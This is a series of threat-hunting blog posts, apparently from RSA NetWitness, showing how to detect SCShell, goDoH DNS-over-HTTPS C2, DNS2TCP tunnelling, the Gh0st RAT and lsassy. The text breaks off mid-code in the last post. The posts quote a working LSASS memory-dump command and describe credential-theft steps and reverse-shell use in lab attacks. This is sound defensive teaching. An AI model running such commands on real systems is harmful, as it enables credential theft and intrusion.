SCShell is not a tool designed to provide a remote semi-interactive shell. It is designed to allow the remote execution of commands on an endpoint utilising only DCE/RPC in an attempt to evade common detection mechanisms; while this tool is slightly stealthier than most in this category, it’s also a bit more limited in what an attacker can do with it.

 

When we first looked at this, we didn't have much in terms of detection, but William Motley from our content team promptly produced an update to the DCERPC parser, which is the basis of this post.

 

The Attack

In the example screenshot below, I run the SCShell binary against an endpoint to launch calc.exe. While this is of no use to an attacker, it is an example we can use to visually confirm the success of the attack on the victim machine:

 

 

It could also be used to launch a Metasploit reverse shell, for example, as shown in the screenshot below. We will cover some of the interesting artifacts left over from this execution in a separate post. Obviously, this is not necessarily something an attacker would do; in their case, something like launching an additional remote access trojan or tool would be more likely:

 

SCShell edits an existing service on the target endpoint; it does not create a new one. Therefore, the service needs to already exist on the target. In the above example, I use defragsvc, as it is a common service on Windows endpoints.

 

RSA NetWitness Network Analysis

There was a recent update to the DCERPC parser, available via RSA NetWitness Live (thanks to Bill Motley); this parser now extracts the API calls made over DCE/RPC, which can be useful in detecting suspect activity over this protocol. If you have set up your subscriptions correctly for this parser (which you should have), it will be updated automatically; otherwise, you will have to push it manually.

 

So, to start my investigation (as per usual) I take a look at my compromise meta keys and notice a meta value of remote service control under the Indicators of Compromise [ioc] meta key. This is an area that should be regularly explored to look for anomalous activity:

 

Pivoting on this meta value and opening up the action and filename meta keys, we can see the interaction with the svcctl interface that is being used to call API functions to query, change, and start an existing service:

 

 

  • StartServiceA - Starts a service.
  • QueryServiceConfigA - Retrieves the configuration parameters of the specified service.
  • OpenServiceA - Opens an existing service.
  • OpenSCManagerW - Establishes a connection to the service control manager on the specified computer and opens the specified service control manager database.
  • ChangeServiceConfigA - Changes the configuration parameters of a service.

 

The traffic sent over DCE/RPC is encrypted, so reconstructing the sessions will not help here, but given that we have full visibility we can quickly pivot to endpoint data to get the answers we need. The following logic would allow you to identify this remote service modification behaviour taking place in your environment and subsequently the endpoints of interest for investigation:

service = 139 && filename = 'svcctl' && action = 'openservicea' && action = 'changeserviceconfiga' && action = 'startservicea'
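Translated out of the query language, the same detection logic can be sketched in Python. A session (represented here as a hypothetical dict of its meta values) matches when it is SMB (service 139), touches the svcctl interface, and contains all three service-control API calls:

```python
REQUIRED_ACTIONS = {"openservicea", "changeserviceconfiga", "startservicea"}

def matches_scshell(session):
    """True when a session's meta matches the rule: SMB (service 139),
    the svcctl interface, and all three service-control API calls."""
    return (
        session.get("service") == 139
        and "svcctl" in session.get("filename", [])
        and REQUIRED_ACTIONS <= set(session.get("action", []))
    )

# A hypothetical session, represented as a dict of its meta values:
session = {
    "service": 139,
    "filename": ["svcctl"],
    "action": ["openscmanagerw", "openservicea", "queryserviceconfiga",
               "changeserviceconfiga", "startservicea"],
}
print(matches_scshell(session))  # → True
```

Note that requiring all three actions together is what keeps ordinary service queries from matching.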

 

RSA NetWitness Endpoint Analysis

A great way to perform threat hunting on a dataset is frequency analysis; this allows us to bubble up outliers and locate suspect behaviour with respect to your environment - an anomaly in one environment can be common in another. In this instance, that could be done by looking for less common executables being spawned by services.exe - the following query would be a good place to start: device.type='nwendpoint' && filename.src='services.exe' && action='createprocess'. We would then open up the Filename Destination meta key and see a large number of results returned:
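The frequency-analysis idea itself fits in a few lines of Python. The counts and executable names below are invented for illustration, but the ascending sort is exactly what surfaces the outliers:

```python
from collections import Counter

# Hypothetical filename.dst values from sessions where
# filename.src = 'services.exe' and action = 'createprocess':
spawned = (["svchost.exe"] * 500 + ["msiexec.exe"] * 40 +
           ["cmd.exe"] * 2 + ["calc.exe"])

counts = Counter(spawned)
# Sorting ascending bubbles the rare (potentially anomalous) executables up.
for name, count in sorted(counts.items(), key=lambda kv: kv[1]):
    print(f"{count:>5}  {name}")
```

The rarest children of services.exe print first, which is the same effect as switching the Navigate view to ascending order.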

 

 

Typically, we tend to view the results from our queries in descending order; in this instance, we want to see the least common, so we switch the sorting to ascending to bubble up the anomalous executables. Now we can analyse the results, and as shown in the screenshot below, we see a couple of interesting outliers: calc.exe and cmd.exe:

 

 

Pivoting into the Events view for cmd.exe, we can see it using mshta to pull a .hta file; clearly this is not good:

 

 

This activity, whereby services.exe spawns a command shell, is out-of-the-box content and can be found under the Behaviors of Compromise [boc] meta key, so this would also be a great way to start an investigation:

 

 

Now that we have suspect binaries of interest, we have files and endpoints we could perform further analysis on to get our investigation fully underway, but for this post I will leave it here.

 

Conclusion

It is important to ensure that all your content in NetWitness is kept up to date - automating your subscriptions to Lua parsers, for example, is a great start. It ensures that you have all the latest metadata being created from the protocols, and improves your ability as a defender to hunt and find malicious behaviours.

 

It is also important to remember that while the initial execution of, say, a binary may not generate a lot of activity, at some point it will have to perform some activity in order to achieve its end goal. Picking up on said activity will allow defenders to pull the thread back to the originating malicious event.

DNS over HTTPS (DoH) was introduced to increase privacy and help prevent the manipulation of DNS data by utilising HTTPS to encrypt it. Mozilla and Google have been testing versions of DoH since June 2018, and have already begun to roll it out to end users via their browsers, Firefox and Chrome. With the adoption rates of DoH increasing, and the fact that C2 frameworks using DoH have been available since October 2018, DoH has become an area of interest for defenders; one C2 that stands out is goDoH by SensePost (https://github.com/sensepost/goDoH).

 

goDoH is a proof of concept Command and Control framework written in Golang that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google and Cloudflare, but it also contains the ability to use traditional DNS.

 

The Attack

With goDoH, the same binary is used for the C2 server, and the agent that will connect back to it. In the screenshot below, I am setting up the C2 on a Windows endpoint - I specify the domain I will be using, the provider to use for DoH, and that this is the C2:

 

 

On the victim endpoint I do the same, but instead specify that this is the agent:

 

 

After a short period of time, our successful connection is made, and we can begin to execute our reconnaissance commands:

 

 

RSA NetWitness Platform Network Analysis: SSL Traffic

Given its default implementation using SSL, there is not a vast amount of information we can extract; however, that does not mean that we cannot locate DoH in our networks. A great starting point is to look at who currently provides DoH - after some Googling, I came across a list of DoH providers on the following GitHub page:

 

 

These providers could be converted into an application rule (or Feed) to tag them in your environment, or utilised in a query to retroactively view DoH usage in your environment. This would help defenders to initially pinpoint DoH usage:

alias.host ends 'dns.adguard.com','dns.google','cloudflare-dns.com','dns.quad9.net','doh.opendns.com','doh.cleanbrowsing.org','doh.xfinity.com','dohdot.coxlab.net','dns.nextdns.io','dns.dnsoverhttps.net','doh.crypto.sx','doh.powerdns.org','doh-fi.blahdns.com','dns.dns-over-https.com','doh.securedns.eu','dns.rubyfish.cn','doh-2.seby.io','doh.captnemo.in','doh.tiar.app','doh.dns.sb','rdns.faelix.net','doh.li','doh.armadillodns.net','jp.tiar.app','doh.42l.fr','dns.hostux.net','dns.aa.net.uk','jcdns.fun','dns.twnic.tw','example.doh.blockerdns.com','dns.digitale-gesellschaft.ch'

NOTE: This is by no means a definitive list of DoH providers. You can use the above as a base, but should collate your own.
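If you want to replicate the rule's suffix-matching behaviour outside NetWitness, a small Python sketch could look like the following. It uses a trimmed, hypothetical subset of the provider list and a slightly stricter label-boundary check than a raw `ends` match:

```python
# Trimmed, hypothetical subset of the DoH provider list above:
DOH_PROVIDERS = (
    "dns.adguard.com", "dns.google", "cloudflare-dns.com",
    "dns.quad9.net", "doh.opendns.com", "doh.cleanbrowsing.org",
)

def is_doh_host(alias_host):
    """Suffix-match a hostname against known DoH providers, requiring a
    label boundary so lookalike registrations don't slip through."""
    host = alias_host.lower().rstrip(".")
    return any(host == p or host.endswith("." + p) for p in DOH_PROVIDERS)

print(is_doh_host("mozilla.cloudflare-dns.com"))  # → True
print(is_doh_host("www.example.com"))             # → False
```

Feeding exported alias.host values through a filter like this is a quick way to retroactively sweep historical data.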

 

Running this query through my lab, I can see there is indeed some DoH activity for the Cloudflare provider:

As this traffic is encrypted, it is difficult to ascertain whether or not it is malicious, but there are a couple of factors that may help us. Firstly, we could reduce the meta values to a more manageable amount by filtering on long connection, which is under the Session Analysis meta key; this is because C2 communications over DoH would typically be long lived:

 

 

We could then run the JA3 hash values through a lookup tool to identify any outliers (in this instance I am left with one due to my lab not capturing a lot of data):

 


For details on how to enable JA3 hashes in the RSA NetWitness Platform, take a look at one of our previous posts: Using the RSA NetWitness Platform to Detect Command and Control: PoshC2 v5.0 

Running the JA3 hash (706ea0b1920182287146b195ad4279a6) through OSINT (https://ja3er.com/form), we get results back for this being Go-http-client/1.1; this is because the goDoH application is written in Golang. This stands out as an outlier, and the source of this traffic would be a machine to perform further analysis on:
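For reference, a JA3 hash is just the MD5 of five ClientHello fields (TLS version, ciphers, extensions, elliptic curves, point formats), comma-separated, with the values inside each field joined by dashes. A sketch with made-up field values:

```python
import hashlib

def ja3_hash(version, ciphers, extensions, curves, point_formats):
    """JA3 = MD5 of the five ClientHello fields, comma-separated, with the
    values inside each list field joined by dashes."""
    fields = [str(version)] + [
        "-".join(str(v) for v in values)
        for values in (ciphers, extensions, curves, point_formats)
    ]
    return hashlib.md5(",".join(fields).encode()).hexdigest()

# Hypothetical ClientHello field values, for illustration only:
print(ja3_hash(771, [49195, 49199], [0, 10, 11], [23, 24], [0]))
```

Because the fields come from the unencrypted ClientHello, the fingerprint survives even when the payload itself cannot be decrypted.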

 

 

 

RSA NetWitness Platform Network Analysis: SSL Intercepted Traffic

Detecting DoH when SSL interception is in place becomes far easier. DoH requests for Cloudflare, for example, supply a Content-Type header that allows us to easily identify them (besides the alias.host value):

 

Determining whether the DoH connections are malicious also becomes far easier when SSL interception is in place, as it allows defenders to analyse the payload that would typically be encrypted. The following screenshot shows the decrypted DoH session between the client and Cloudflare - here we are able to see the DNS request and response in the clear, which divulges the C2 domain being used, go.doh.dns-cloud.net. We can also see that the JA3 hash we previously reported was correct, as the User-Agent is Go-http-client/1.1:

 

 

The session for this DoH C2 traffic is quite large, so I am unable to show it all - this is due to the limited amount of information that can be transmitted via each DNS query. An example of data being transmitted via an A record can be seen below - the data is encrypted so won't make sense by merely viewing it:

 

 

Within this session there are hundreds of requests for the go.doh.dns-cloud.net domain with a very high variability in the FQDN seen in the name parameter of the query; this is indicative behaviour of C2 communication over DNS. Below I have merged five of the requests together in order to help demonstrate this variability:

 

 

Given the use of TCP for HTTPS versus the common use of UDP for DNS, the traffic shows as a single session in the RSA NetWitness Platform due to TCP session/port reuse; normally, this type of activity would present itself over a larger number of RSA NetWitness Platform sessions when using native DNS.

 

RSA NetWitness Endpoint Analysis

Looking at my compromise keys, I decide to start my triage by pivoting into the Events view for the meta value runs powershell with http argument, as shown below.

 

 

From the following screenshot, we can see an executable named googupdater.exe, running out of the user's AppData directory, executing a PowerShell command to get the public IP of the endpoint. We also get to see the parameter that was passed to the googupdater.exe binary, which reveals the domain being contacted:

 

NOTE: googupdater.exe is the goDoH binary and was renamed for dramatic effect.

We could also have pivoted on the outbound from unsigned appdata directory meta value, which would have led us to this suspect binary. While from an Endpoint perspective this is just another compiled tool communicating over HTTPS, the fact that it needs to spawn external processes to execute activity would lead us to an odd parent process:

 

 

Given this scenario in terms of Endpoint, this would lead us back to common hunting techniques, but in the interest of brevity, I won't dig deeper for this tool. The key items would be an uncommon parent process for some unusual activity, and the outbound connections from an unsigned tool. While both can at times be noisy, in conjunction with other drills, they can be narrowed down to cases of interest.

 

Conclusion

This post further substantiates the requirement for SSL interception, as it vastly improves the defender's capability to investigate and triage potentially malicious communications. While it is still possible to identify suspect DoH traffic without SSL interception, it can be incredibly difficult to ascertain its intentions. DNS is also a treasure trove for defenders, and the introduction and use of DoH could vastly diminish their ability to protect the network effectively.

When performing network forensics, all protocols should be analysed; however, some tend to be more commonly abused than others, one of these being DNS. While not as flexible as, say, HTTP, DNS flows through and out of networks far more easily due to how it is typically configured. This means that DNS can be utilised to encapsulate data that will be routed to an attacker-controlled name server outside the network, allowing data exfiltration or the download of tools. In this post, I will cover how we can use NetWitness Network to analyse the DNS protocol effectively; to do so, we will use a tool called DNS2TCP (https://github.com/alex-sector/dns2tcp) in our lab to generate some sample traffic.

 

DNS record types

The DNS standard defines more than 80 record types, but many of these are seldom used. The most common are:

  • A Record - used to map a host and domain name to the IP address (forward lookup)
  • PTR Record - used to map an IP address to host and domain name (reverse lookup)
  • MX Record - to return host and domain mapping for mail servers
  • CNAME Record - used to return an alias to other A or CNAME records
  • TXT Record - used to provide the ability to associate arbitrary text with a host or other name

 

In this post, we will focus on TXT records being used to encapsulate data. TXT records are typically utilised as the size of this field allows for larger amounts of data to be transferred in a single request compared to A, or AAAA records. This field is also legitimately used to provide SPF records, specify the domain owner, return the full name of the organization, as well as other similar uses.

 

How Does NetWitness Network Analyse DNS?

The DNS_verbose_lua parser is available from RSA Live; it extracts metadata of interest from the DNS protocol that can help a defender identify anomalous DNS traffic. We suggest that you subscribe to this parser (and others), as they are updated regularly.

 

 

Which metadata can help with the analysis?

The following meta keys are particularly useful for identifying, and subsequently analysing the DNS protocol:

Meta Key         | Description                                                                         | Indexed by default
service          | The protocol as identified by NetWitness                                            | Yes
alias.host       | The hostnames being resolved                                                        | Yes
alias.ip         | The IP address that the hostname resolves to                                        | Yes
service.analysis | Meta values surrounding the characteristics of the protocol                         | Yes
tld              | The top-level domain extracted from the hostname                                    | Yes
sld              | The part of the hostname directly below the top-level domain (second-level domain)  | No
dns.resptext     | The response for the DNS TXT record                                                 | No
dns.querytype    | The human-readable value for the DNS query type performed in the request            | No
dns.responsetype | The human-readable value for the DNS query type returned by the response            | No

 

You will notice from the table above that some of the meta keys are not indexed by default. The following entries would therefore need to be added to the Concentrator index file so that they can be used in investigations:

<key description="SLD" format="Text" level="IndexValues" name="sld" defaultAction="Closed" valueMax="500000" />
<key description="DNS Query Type" format="Text" level="IndexValues" name="dns.querytype" valueMax="100" />
<key description="DNS Response Type" format="Text" level="IndexValues" name="dns.responsetype" valueMax="100" />
<key description="DNS Response TXT" format="Text" level="IndexValues" name="dns.resptext" valueMax="500000" />

NOTE: Details regarding the Concentrator index, such as how it works, ensuring optimal performance, and how to add entries can be found here: https://community.rsa.com/docs/DOC-100556

 

DNS2TCP

DNS2TCP is a tool that encapsulates TCP sessions within the DNS protocol. On the server side, we configure the tool to listen on UDP port 53, as per the DNS standard; we also specify our domain, "dns2tcp.slbwyfqzxn.cloud", and the resources. A resource is a local or remote service listening for TCP connections - in the example below, I specify a resource named SSH for connections to port 22 on 127.0.0.1:

The client will act as a relay for a specific resource, SSH in our example, and will listen on the specified port (2222) and forward traffic from the local machine to the remote server via DNS TXT records:

Once the communication between the client and server has been established, we can then connect to the server using SSH that will be encapsulated in DNS:

 

NetWitness Network Analysis

Homing in on DNS traffic is incredibly easy with NetWitness: we merely need to look for DNS under the Service meta key, or execute the query "service = 53". To focus on possibly encoded DNS TXT records, we can pivot on the meta values "dns base36 txt record" and "dns base64 txt record", located under the "Session Analysis" meta key. Tunnelling tools encode the data in the TXT record due to the limitations placed on the record type, such as only allowing printable ASCII symbols and a maximum length of 255 characters. 
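To get a feel for why such tools must encode and chunk their data, here is a rough Python sketch of packing an arbitrary payload into base64 TXT-record strings; the 189-byte chunk size is chosen so each encoded string stays under the 255-character limit:

```python
import base64

def to_txt_records(data, chunk_size=189):
    """Base64-encode a payload and split it into TXT-sized strings.

    189 raw bytes encode to 252 base64 characters, keeping each record
    under the 255-character limit of a single TXT character-string.
    """
    return [base64.b64encode(data[i:i + chunk_size]).decode()
            for i in range(0, len(data), chunk_size)]

records = to_txt_records(b"SSH-2.0-OpenSSH_8.2 " * 30)  # 600-byte payload
print(len(records), max(len(r) for r in records))       # → 4 252
```

Any non-trivial payload therefore spreads across many requests, which is part of what makes the traffic pattern detectable.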

From the screenshot below, we can see a suspicious-sounding SLD with a large number of NetWitness sessions that would be worth investigating.

From here, I like to open the "SLD", "Hostname Alias", and "DNS Response Text" meta keys. What you can see from the screenshot below is a large number of unique "alias.host" or "dns.resptext" values for a single SLD, which is indicative of possible DNS tunnelling. The requests are highly unique so that they are not answered by the local DNS cache or the cache on the internal DNS servers.

The screenshot below shows the elevated number of different TXT records associated with the single SLD "slbwyfqzxn".

NOTE: Some commercial software packages, such as antivirus and antispam tools, show similar behaviour and exchange data over DNS TXT records for their own security checks.
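The "many unique FQDNs per SLD" observation can be turned into a simple scoring sketch. The hostnames below are invented, and the SLD extraction is naive (no public-suffix handling), but a ratio close to 1.0 is what tunnelling traffic tends to produce:

```python
from collections import defaultdict

def sld(hostname):
    # Naive second-level-domain extraction (no public-suffix handling).
    parts = hostname.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else hostname

def unique_ratio_per_sld(hostnames):
    """Ratio of unique FQDNs per SLD; tunnelling traffic sits near 1.0
    because every query carries a fresh chunk of data."""
    seen, totals = defaultdict(set), defaultdict(int)
    for h in hostnames:
        s = sld(h)
        seen[s].add(h.lower())
        totals[s] += 1
    return {s: len(v) / totals[s] for s, v in seen.items()}

# Invented sample queries:
queries = ["a9f3.dns2tcp.slbwyfqzxn.cloud", "c41b.dns2tcp.slbwyfqzxn.cloud",
           "7e2d.dns2tcp.slbwyfqzxn.cloud", "www.example.com",
           "www.example.com"]
print(unique_ratio_per_sld(queries))  # → {'slbwyfqzxn': 1.0, 'example': 0.5}
```

Legitimate domains get repeated (cacheable) lookups and score low; tunnelled domains score near 1.0.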

 

Reconstructing the sessions, we can see the TXT records and use the built-in Base64 decoding capability to see what data was encapsulated. In the screenshot below, we can see the initialisation of an SSH session:

 

Conclusion

DNS is commonly overlooked and is an area that defenders should pay more attention to; it is a great way to exfiltrate data out of an otherwise “secured” network. DNS2TCP is just one of the tools that allow data to be encapsulated within DNS. There are many others, but they all behave similarly and can be identified using techniques like those shown in this post.

In order to defend their network effectively, analysts need to understand the threat landscape, and more specifically how individual threats present themselves in their tools. With that in mind, I started researching common Remote Access Trojans/Tools (RATs) that are publicly available for anyone to use. This post will walk you through Gh0st RAT (https://attack.mitre.org/software/S0032/), its footprint, and how the RSA tools help you detect its presence from both the endpoint and packet perspectives.

 

Just like any malware, a Gh0st infection will involve some sort of delivery mechanism. Most mature SOCs with capable tools should get an alert on either its delivery (using common methods such as phishing, drive-by download, etc.) or its subsequent presence on an endpoint. However, let’s assume that it does not get detected, and that as an analyst you are proactively hunting in your environment. How would you go about detecting the presence of such a Trojan?

 

Gh0st Overview and Infection

Gh0st is a very well-documented RAT, but below you’ll find a quick overview of some of its functionality and the way it was configured for testing purposes. I will also show you how our tools can help identify Gh0st.  The Gh0st server component is a standalone portable executable (PE) file, which gives you a simple interface when executed.  Once executed, the server component is used not only to control infected systems, but also to configure the client component that is delivered to victims.

 

                    

Figure 1: Gh0st Interface

 

The build tab that is used to configure the client executable had some default HTTP settings, which I changed to use “gh0st[.]com” for simplicity.  I also created an entry in DNS for this domain to point to our command and control (C2) server.

 

                    

Figure 2: Gh0st HTTP and Service Options

 

You can also see that the Build tab contains options for the service display name and description.  After I created the malicious client component sample, I crafted an email using Outlook Web Access on Exchange and sent it to the victim.

 

                      

Figure 3: Phishing Email

 

The victim setup had Windows 10 installed using all default settings.  Once the user received the email, I was surprised to learn that this wasn’t flagged by local Antivirus or any other tools.    Even after I executed the PE file, it was not flagged as malicious.  It installed the service as seen here but there was no initial identification and no “alarms” were raised. 

                                             

Figure 4: Service Installed

 

 The malware executed fine, and I could see the connection through the Gh0st Dashboard on the server component.

 

                   

Figure 5: Successful Client Connection

 

From here, I used some of the built-in features of Gh0st to control and interact with the endpoint.  Here are some of those features:

 

                                                

Figure 6: Options Once Connected

 

I first opened a “Remote Shell” which basically just gives you a command prompt with System level permissions.

 

               

Figure 7: Remote Shell

 

From there, I executed net user commands through the remote shell.  The net user commands are for reconnaissance and used to identify what users are on the machine.  They can be used in conjunction with a username to identify what groups the user belongs to.

 

                     

Figure 8: Running Commands Using Remote Shell

 

Next, I modified the registry to allow for cleartext credential storage in memory. I then copied procdump over to the machine using the “File Manager” feature, and used procdump to dump the lsass.exe memory into a .dmp file.  Finally, I copied that .dmp file back over to my C2 server.  This is a common technique for getting credentials out of memory in cleartext.  The attacker can use these credentials to access other parts of the network.
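On the detection side, the registry change that enables cleartext credential storage is the well-known WDigest UseLogonCredential tweak, which is easy to flag in command-line telemetry. A minimal sketch (the command-line event below is a hypothetical example):

```python
import re

# The WDigest UseLogonCredential value is the classic switch that makes
# LSASS keep cleartext credentials in memory; flag it in command lines.
WDIGEST = re.compile(r"wdigest.*uselogoncredential", re.IGNORECASE)

def flags_cleartext_storage(cmdline):
    return bool(WDIGEST.search(cmdline))

# A hypothetical command-line event:
cmd = (r"reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders"
       r"\WDigest /v UseLogonCredential /t REG_DWORD /d 1")
print(flags_cleartext_storage(cmd))  # → True
```

There is essentially no legitimate reason to flip this value, so even a crude match like this produces high-fidelity hits.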

 

                        

Figure 9: File Manager

 

Figure 10: Procdump on LSASS

 

RSA NetWitness Endpoint 4.4 Detection

Prior to performing any of the aforementioned steps, I installed RSA NetWitness Endpoint on the victim and created a baseline of the IIOCs.  This was also prior to performing any additional interaction with the hosts.  These IIOCs were coming from multiple machines since I had Windows 10 and Windows 7 victims with agents installed.  There was only one level 1 IIOC and not much else going on.

Once the email was opened and the file was clicked, there were some additional IIOCs that fired including:

  • Unsigned writes executable
  • Unsigned writes executable to appdata local directory
  • Unsigned writes executable to Windows directory
  • Renames files to executable

 

Figure 11: IIOCs Fired in RSA NetWitness Endpoint

 

 

These are all great hunting indicators that should be checked daily, with the results triaged and appropriate measures taken for each hit.

Then I pivoted from those IIOCs and looked for the “invoice.exe” module in the tracking data.  This showed me the “FastUserSwitchingCapability” service being created.

 

Figure 12: Service Created

 

Also, this is where the net user commands were found. 

 

Figure 13: Net User Commands Found in RSA NetWitness Endpoint

 

Once the registry change for cleartext credential storage was executed, the IIOC for that fired as seen here.

 

Figure 15: More IIOCs

 

So, going back to the service, we can see that it created an Autorun entry, which was given a high IIOC score.

 

Figure 16: Autoruns in RSA NetWitness Endpoint

 

It’s was also listed in the modules.

 

Figure 17: Modules Listed

 

RSA NetWitness Endpoint 11.3 Detection

Here’s how things look in RSA NetWitness Endpoint 11.3.  First here is the baseline IOC, BOC, EOC, and File Analysis meta fields after the agent has been installed.

 

Figure 18: RSA NetWitness Endpoint 11.3 Baseline

 

This is the risk score for the host, which is based on the Windows firewall being disabled.

 

Figure 19: Initial RSA NetWitness Endpoint 11.3 Risk Score

 

After I executed the dropper there was some additional meta generated including:

  • Unsigned writes executable to appdata local directory
  • Runs service control tools
  • Starts local service
  • Auto unsigned hidden
  • Auto unsigned servicedll

 

Figure 20: Additional Meta after Dropper Execution

Figure 21: Invoice.exe Creating Files in AppData Folder

 

We can also see this alert for “Autorun Unsigned Servicedlls” which is related to the “autorun unsigned servicedll” meta in the Navigate view.

 

Figure 22: Risk Score Increase

Figure 23: Autoruns with Four DLLs

Figure 24: Autorun Unsigned Servicedll Meta

 

Next, I opened up a remote shell using the Gh0st dashboard and executed some basic reconnaissance commands (whoami, net user /domain, etc) just like in RSA NetWitness Endpoint 4.4.

 

Figure 25: Reconnaissance Commands

 

Again, I executed the registry command to enable cleartext credential storage and ran procdump on the lsass.exe process.  That triggered a critical alert in RSA NetWitness Endpoint 11.3, which gave a risk score of 100, just like in RSA NetWitness Endpoint 4.4.

 

Figure 26: Registry Command to Enable Cleartext Credential Storage

 

Also, going back to look at the navigate view, there was some additional meta generated for these commands.

  • Enumerates domain users
  • Modifies registry using command-line registry tool
  • Runs registry tool
  • Enables cleartext credential storage
  • Gets current user as system
  • Gets current user

 

Figure 27: Additional Meta

 

RSA NetWitness Network Detection

While there are obviously various detection capabilities for identifying delivery of the gh0st executable, the purpose of this post is to discuss the presence of the gh0st RAT once a system is infected.  As such, the RSA NetWitness Packets (NWP) Gh0st parser detected the presence of the Gh0st trojan based on the communications between the gh0st server and client. Just by looking in the "Indicators of Compromise" meta key, the Gh0st traffic is listed there.  With just one click I was able to find the C2 activity using RSA NetWitness Platform packet data.

 

Figure 18: IOC Meta in the RSA NetWitness Platform

 

As mentioned earlier, one of the benefits of doing this is that when we identify gaps, we work with people like Bill Motley in our content team to create appropriate content.  Initially the parser wasn’t detecting this specific gh0st activity but that has been fixed. An updated parser is now available in RSA NetWitness Live.

 

Here we can see some of the Gh0st C2 traffic that generates the IOC meta mentioned before.

 

Figure 19: Gh0st C2 Seen in the RSA NetWitness Platform

 

Also, here is the HTTP traffic, which is a heartbeat callout to check that the client is still connected.  It makes this HTTP GET request about every two minutes, and only the string "Gh0st" is returned.

 

Figure 20: Heartbeat Traffic
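The near-constant two-minute interval of this heartbeat is itself a useful hunting signal. As a purely illustrative sketch (not a NetWitness feature), the idea can be expressed in a few lines of Python that flag a series of event times whose inter-arrival gaps have very low jitter:

```python
from statistics import mean, pstdev

def looks_like_beacon(timestamps, tolerance=0.1):
    """Flag event times (in seconds) whose inter-arrival intervals are
    nearly constant, e.g. a C2 heartbeat firing every ~120 seconds."""
    if len(timestamps) < 4:
        return False
    deltas = [b - a for a, b in zip(timestamps, timestamps[1:])]
    avg = mean(deltas)
    # A heartbeat shows very low jitter relative to its interval;
    # normal browsing produces highly irregular gaps.
    return avg > 0 and pstdev(deltas) / avg < tolerance

# Gh0st-style heartbeat: one GET roughly every two minutes.
heartbeat = [0, 120, 241, 360, 481, 600]
browsing = [0, 5, 9, 300, 302, 420]
print(looks_like_beacon(heartbeat))  # True
print(looks_like_beacon(browsing))   # False
```

The 10% tolerance is an assumed threshold for illustration; real traffic would need tuning against your own baseline.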

 

Even without this parser, Gh0st C2 traffic can be found with as little as three pieces of metadata.  First, looking at service metadata labeled as ‘OTHER’ which can be a good place to start hunting because it’s network traffic that doesn’t have a known parser and/or doesn’t follow the RFCs for known protocols.  Then, in the IOC meta there was ‘binary indicator’ which can help limit the dataset.  Finally, in the analysis.service metadata the ‘unknown service over http port’ value stuck out.  Performing these three pivots from the full dataset found all of the gh0st traffic, including some additional traffic not seen previously.  That can be seen in the screenshot below under the Indicators of Compromise column.  There are IOCs showing gh0st but there are also some that only show the traffic as binary.

 

Figure 21: Additional Traffic Not Seen Previously

 

Summary

Gh0st is one of the simplest and easiest RATs to use.  The RSA NetWitness Platform had no trouble finding this activity.  Though this is a publicly available and commonly used RAT, it frequently goes unidentified by AV and other technologies, as referenced in my example.  This is where the power of regular threat hunting comes in, since it helps you detect unknown threats that your regular tools don’t necessarily pick up on. Some of these can be automated, as we did with the parser changes.

 

This means that, in the future, you no longer need to look for this specific threat but can instead follow this process, which will hopefully lead you to newer unknown threats. Using the right tools coupled with the right methodology will help you better protect your network/organization; unfortunately, not all of this can be fully automated, and some of the automation will still require appropriate human triage.

A couple of days ago on GitHub, Hackndo released a tool (https://github.com/Hackndo/lsassy) that is capable of dumping the memory of LSASS using LOLBins (Living off the Land Binaries) - typically we would see attackers utilising the SysInternals ProcDump utility to do this. Lsassy uses the MiniDump function from comsvcs.dll in order to dump the memory of the LSASS process. This action can only be performed as SYSTEM, so the tool creates a scheduled task as SYSTEM, runs it, and deletes it.

 

We decided to take this tool for a spin in our lab and see how we would detect this with NetWitness.

 

The Attack

To further entrench themselves and find assets of interest, an attacker will need to move laterally to other endpoints in the network. Reaching this goal often involves pivoting through multiple systems, as well as dumping LSASS to extract credentials. In the screenshot below, we use the lsassy tool to dump credentials from a remote host that we currently have access to:

 

The output of this command shows us the credentials for an account we are already aware of, but also shows us credentials for an account we previously did not know about, tomcat-svc.

 

NetWitness Network Analysis

I like to start my investigation every morning by taking a look at the Indicators of Compromise meta key; this way I can identify any new meta values of interest. Highlighted below is one that I rarely see (of course, in some environments this can be common activity, but anomalies in which endpoints it takes place on can still be identified):

 

Reconstructing the session, we can see the remote scheduled task that was created and analyse what it is doing. From the below screenshot, we can see the task created will use CMD to launch a command to locate LSASS, and subsequently dump it to \Windows\Temp\tmp.dmp using the MiniDump function within the comsvcs.dll:

 

cmd.exe /C for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\tmp.dmp full

This task also leaves other artifacts of interest behind. From the screenshot below, we can see the tmp.dmp LSASS dump being created and read:

 

This makes the default usage of lsassy easy to detect with simple application rule logic such as the below. Of course the names and location of the dump can be altered, but attackers typically tend to leave the defaults for these types of tools:

service = 139 && directory = 'windows\\temp\\' && filename = 'tmp.dmp'

 

NetWitness Endpoint Analysis

Similarly with Endpoint, I like to start my investigations by opening up the Compromise meta keys - IOC, BOC, and EOC. From here I can view any meta values that stand out, or iteratively triage through them. One of the meta values of interest from the below is, enumerates processes on local system:

Pivoting into the Events view for this meta value, we can see cmd.exe launching tasklist to look for lsass.exe - to get proper access, the command is also executing with SYSTEM level privileges - this is something you should monitor regularly:

 

After seeing this command, it would be a good idea to look at all activity targeted toward LSASS for this endpoint. To do that, I can use the query filename.dst = 'lsass.exe' and start to investigate by opening up meta keys like the ones below. Something that stands out as interesting is the usage of rundll32.exe to load a function called minidump from the comsvcs.dll:

Pivoting into the Events view, we can see the full command a lot easier. Here we can see that rundll32.exe is loading the MiniDump function from comsvcs.dll and passing some parameters, such as the process ID for dumping (which was found by the initial process enumeration), location and name for the dump, and the keyword full:

 

This activity could be picked up by using the following logic in an application rule. This will be released via RSA Live soon, but you can go ahead and implement/check your environment now:

device.type = 'nwendpoint' && category = 'process event' && (filename.all = 'rundll32.exe') && ((param.src contains 'comsvcs.dll' && param.src contains 'minidump') || (param.dst contains 'comsvcs.dll' && param.dst contains 'minidump'))
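For triage outside the platform (for example, when sweeping exported process logs), the same logic can be mirrored in a few lines. This Python check is purely illustrative; the sample command line is modelled on the scheduled-task command shown earlier, with a made-up process ID:

```python
def flags_minidump_via_comsvcs(cmdline: str) -> bool:
    """Flag command lines that load the MiniDump export from
    comsvcs.dll via rundll32 - the lsassy/LOLBin dumping pattern."""
    c = cmdline.lower()
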